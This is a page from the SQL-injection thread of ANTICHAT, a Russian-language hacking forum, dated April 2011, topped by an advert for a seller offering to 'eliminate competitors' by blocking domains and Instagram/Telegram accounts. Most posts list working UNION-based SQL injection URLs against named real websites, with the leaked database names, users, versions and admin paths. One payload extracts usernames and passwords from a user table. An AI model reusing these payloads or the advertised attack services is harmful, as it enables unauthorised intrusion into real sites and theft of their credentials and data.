УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 1384 из 1604

1384

Опции темы

Поиск в этой теме

Опции просмотра

#13831

10.04.2011, 01:06

Amoura

Участник форума

Регистрация: 23.01.2008

Сообщений: 182

Провел на форуме:
2268999

Репутация: 410

Отправить сообщение для Amoura с помощью ICQ

Код:

Code:
http://www.hispanicheritage.org/press_news.php?id=-180+union+select+1,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,3,4--

hispanj6_hhawards:5.1.47-community-log:hispanj6_hhf2@localhost

#13832

10.04.2011, 01:21

S[N]EP

Познающий

Регистрация: 29.08.2008

Сообщений: 86

Провел на форуме:
789539

Репутация: 53

ТИЦ 60

Код:

Code:
http://www.avsshop.ru/index.php?idtov=871291+and+1=2+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2--+

5.1.50-log:u278685@10.8.3.21:u278685_2

p.s. "Маленький" облом на Админке

#13833

10.04.2011, 08:53

stepashka_

Познавший АНТИЧАТ

Регистрация: 09.11.2009

Сообщений: 1,077

Провел на форуме:
7879791

Репутация: 265

Отправить сообщение для stepashka_ с помощью ICQ

Цитата:

Сообщение от None

http://www.rabotniki66.ru/ind.php?pn=1&id_categ=-13+union+select+1,2,3,4,5,6,7,version(),9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31--+

4.1.24-max-log

Цитата:

Сообщение от None

http://www.mckn.ru/gocka/ind.php?pn=3&id_categ=-3+union+select+1,2,3,4,5,UNHEX(HEX(version())),7,8 ,9,10,11,12,13,14,15--+

http://www.mckn.ru/admin/

4.1.11-Debian_4sarge5-log

тиц 120 pr 2

Цитата:

Сообщение от None

http://objavlenij.net/ind.php?pn=30&id_categ=8+union+select+1,2,3,4,5,6, version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27--+

http://objavlenij.net/Admin/

5.0.92-community-log

Цитата:

Сообщение от None

http://www.prodamzoo.ru/ind.php?pn=1&id_typ=-176+union+select+1,2,3,4,5,6,table_name,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr om+information_schema.tables--+

http://www.prodamzoo.ru//Admin/

5.0.77-log

#13834

10.04.2011, 11:48

ubi

Новичок

Регистрация: 25.12.2009

Сообщений: 18

Провел на форуме:
278340

Репутация: 0

Indonesian Mining Association

http://www.ima-api.com/about.php?act=detail&id=-93+union+select+1,concat_ws(0x3a,version(),user(), database(),@@version_compile_os),3,4,5,6,7,8,9+--+

5.0.27-standard:u6183_imaAPI09@localhost:u6183_imaAPI09: pc-linux-gnu.

http://www.ima-api.com/about.php?act=detail&id=-93+union+select+1,concat_ws(0x3a,name, passwd),3,4,5,6,7,8,9+from+tbuser+--+

PR 4

#13835

10.04.2011, 12:55

Amoura

Участник форума

Регистрация: 23.01.2008

Сообщений: 182

Провел на форуме:
2268999

Репутация: 410

Код:

Code:
http://www.galoshishoes.ru/katalog.php?id=-20+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8--

b55136:5.0.90:u55136@78.108.84.81

#13836

10.04.2011, 13:30

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

Вопрос по поводу иньекции:

Цитата:

Сообщение от None

query failed
SELECT * FROM campus WHERE campus_id = 9999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
The used SELECT statements have a different number of columns

А когда добавляю ещё одно поле, то выдаёт:

Цитата:

Сообщение от None

Notice: Undefined index: notify_list in /var/www/email/index.php on line 86
query failed
SELECT program_name FROM program WHERE program_pk =
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Количество полей получается подобрал? Но как действовать тут дальше?

#13837

10.04.2011, 13:35

bloodAngel

Новичок

Регистрация: 29.06.2007

Сообщений: 18

Провел на форуме:
642141

Репутация: 17

Отправить сообщение для bloodAngel с помощью ICQ

Цитата:

Сообщение от SergioBlog

SergioBlog said:
Вопрос по поводу иньекции:
А когда добавляю ещё одно поле, то выдаёт:
Количество полей получается подобрал? Но как действовать тут дальше?

делай вывод через помилку, сайт в студию)

#13838

10.04.2011, 13:58

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

Всё допилил, спасибо за ответ

#13839

10.04.2011, 14:27

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

Сори ошибся топиком =\

#13840

10.04.2011, 15:05

stepashka_

Познавший АНТИЧАТ

Регистрация: 09.11.2009

Сообщений: 1,077

Провел на форуме:
7879791

Репутация: 265

Цитата:

Сообщение от None

http://www.biznes-navigator.ru/ind.php?pn=1&id_typ=176+union+select+1,2,3,4,5,6,v ersion(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27--+

http://www.biznes-navigator.ru/Admin/

5.0.91-community

Цитата:

Сообщение от None

http://saratov.dohod.info/doska/ind.php?pn=52&id_categ=-24+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15--+

4.1.25-log